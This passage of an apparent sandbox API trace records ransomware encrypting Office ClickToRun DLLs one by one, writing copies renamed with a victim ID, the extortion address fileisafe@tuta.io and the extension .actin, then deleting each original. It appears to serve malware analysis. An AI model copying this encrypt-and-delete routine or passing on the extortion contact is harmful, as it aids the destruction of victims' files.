(lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll")) returned 0x20 [0068.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.267] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0068.267] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.267] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.267] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.267] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71d40) returned 1 [0068.267] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.268] ReadFile (in: hFile=0x334, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x58c0, lpOverlapped=0x0) returned 1 [0068.269] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x58d0, dwBufLen=0x58d0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x58d0) returned 1 [0068.269] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x58d0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x58d0, lpOverlapped=0x0) returned 1 [0068.270] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d80) returned 1 [0068.270] CryptSetKeyParam (hKey=0xf71d80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.270] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70, dwBufLen=0x70 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70) returned 1 [0068.270] CryptDestroyKey (hKey=0xf71d80) returned 1 [0068.270] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x122, lpOverlapped=0x0) returned 1 [0068.270] CryptDestroyKey (hKey=0xf71d40) returned 1 [0068.270] CloseHandle (hObject=0x334) returned 1 [0068.270] CloseHandle (hObject=0x268) returned 1 [0068.271] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll")) returned 1 [0068.272] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0068.529] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=19136) returned 1 [0068.529] CloseHandle (hObject=0x320) returned 1 [0068.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll")) returned 0x20 [0068.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.529] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0068.529] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.530] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.530] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.530] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71ec0) returned 1 [0068.530] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.530] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x4ac0, lpOverlapped=0x0) returned 1 [0068.531] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4ad0, dwBufLen=0x4ad0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4ad0) returned 1 [0068.531] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x4ad0, lpOverlapped=0x0) returned 1 [0068.532] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d00) returned 1 [0068.532] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.532] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70, dwBufLen=0x70 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70) returned 1 [0068.532] CryptDestroyKey (hKey=0xf71d00) returned 1 [0068.532] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x122, lpOverlapped=0x0) returned 1 [0068.532] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0068.532] CloseHandle (hObject=0x320) returned 1 [0068.533] CloseHandle (hObject=0x268) returned 1 [0068.533] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll")) returned 1 [0068.534] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.534] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.535] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=70848) returned 1 [0068.535] CloseHandle (hObject=0x268) returned 1 [0068.535] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll")) returned 0x20 [0068.535] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.535] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.535] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.535] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.535] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0068.535] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71dc0) returned 1 [0068.535] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.535] ReadFile (in: hFile=0x268, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x114c0, lpOverlapped=0x0) returned 1 [0068.537] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x114d0, dwBufLen=0x114d0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x114d0) returned 1 [0068.537] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x114d0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x114d0, lpOverlapped=0x0) returned 1 [0068.539] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71c80) returned 1 [0068.539] CryptSetKeyParam (hKey=0xf71c80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.539] CryptEncrypt (in: hKey=0xf71c80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70, dwBufLen=0x70 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70) returned 1 [0068.539] CryptDestroyKey (hKey=0xf71c80) returned 1 [0068.539] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x122, lpOverlapped=0x0) returned 1 [0068.539] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0068.539] CloseHandle (hObject=0x268) returned 1 [0068.539] CloseHandle (hObject=0x320) returned 1 [0068.541] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll")) returned 1 [0068.542] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.542] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0068.542] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=19648) returned 1 [0068.542] CloseHandle (hObject=0x320) returned 1 [0068.543] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll")) returned 0x20 [0068.543] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.543] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0068.543] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.543] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.543] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.543] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72080) returned 1 [0068.543] CryptSetKeyParam (hKey=0xf72080, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.543] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x4cc0, lpOverlapped=0x0) returned 1 [0068.545] CryptEncrypt (in: hKey=0xf72080, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4cd0, dwBufLen=0x4cd0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4cd0) returned 1 [0068.545] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x4cd0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x4cd0, lpOverlapped=0x0) returned 1 [0068.546] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d80) returned 1 [0068.546] CryptSetKeyParam (hKey=0xf71d80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.546] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70, dwBufLen=0x70 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70) returned 1 [0068.546] CryptDestroyKey (hKey=0xf71d80) returned 1 [0068.546] WriteFile (in: hFile=0x268, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x122, lpOverlapped=0x0) returned 1 [0068.546] CryptDestroyKey (hKey=0xf72080) returned 1 [0068.546] CloseHandle (hObject=0x320) returned 1 [0068.546] CloseHandle (hObject=0x268) returned 1 [0068.547] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll")) returned 1 [0068.548] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.548] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.549] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=23232) returned 1 [0068.549] CloseHandle (hObject=0x268) returned 1 [0068.549] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll")) returned 0x20 [0068.549] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.549] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.549] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.549] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.549] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0068.550] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71b40) returned 1 [0068.550] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.550] ReadFile (in: hFile=0x268, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x5ac0, lpOverlapped=0x0) returned 1 [0068.551] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x5ad0, dwBufLen=0x5ad0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x5ad0) returned 1 [0068.551] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x5ad0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x5ad0, lpOverlapped=0x0) returned 1 [0068.552] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72040) returned 1 [0068.552] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0068.552] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70, dwBufLen=0x70 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x70) returned 1 [0068.552] CryptDestroyKey (hKey=0xf72040) returned 1 [0068.552] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x122, lpOverlapped=0x0) returned 1 [0068.552] CryptDestroyKey (hKey=0xf71b40) returned 1 [0068.552] CloseHandle (hObject=0x268) returned 1 [0068.553] CloseHandle (hObject=0x320) returned 1 [0068.553] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll")) returned 1 [0068.555] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0068.555] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0068.555] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=24768) returned 1 [0068.555] CloseHandle (hObject=0x320) returned 1 [0068.555] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll")) returned 0x20 [0068.555] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.555] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0068.555] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.555] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0068.555] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0068.556] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: 